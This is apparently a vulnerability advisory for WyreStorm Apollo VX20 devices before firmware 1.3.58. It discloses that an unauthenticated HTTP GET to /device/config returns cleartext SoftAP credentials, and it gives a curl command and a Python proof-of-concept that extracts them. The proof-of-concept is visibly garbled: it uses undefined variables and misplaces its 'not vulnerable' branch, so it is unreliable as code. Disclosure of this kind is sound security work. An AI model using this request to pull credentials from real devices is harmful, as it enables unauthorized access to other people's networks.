APOLLO VX20 < 1.3.58

[Vulnerability Type]
Incorrect Access Control (Credentials Disclosure)

[Affected Component]
Web interface, config

[Affected Product Code Base]
APOLLO VX20 < 1.3.58, fixed in v1.3.58

[CVE Reference]

[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58.
Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.
The credentials are then returned in the HTTP response. curl -k https://192.168.x.x/device/config

E.g. HTTP response snippet:


import requests

res = requests.get(target+"/device/config", verify=False)

if idx != -1:
    if idx2 != -1:
        print("[+] CVE-2024-25735 Credentials Disclosure")
        print("[+] " + res.content[idx + 1:idx2 + 11])
        print("[+] hyp3rlinx")
    print("[!] Apollo vX20 Device not vulnerable...")

[Network Access]


[Disclosure Timeline]
Vendor Notification: January 18, 2024
Vendor released fixed firmware v1.3.58: February 2, 2024
February 11, 2024 : Public Disclosure

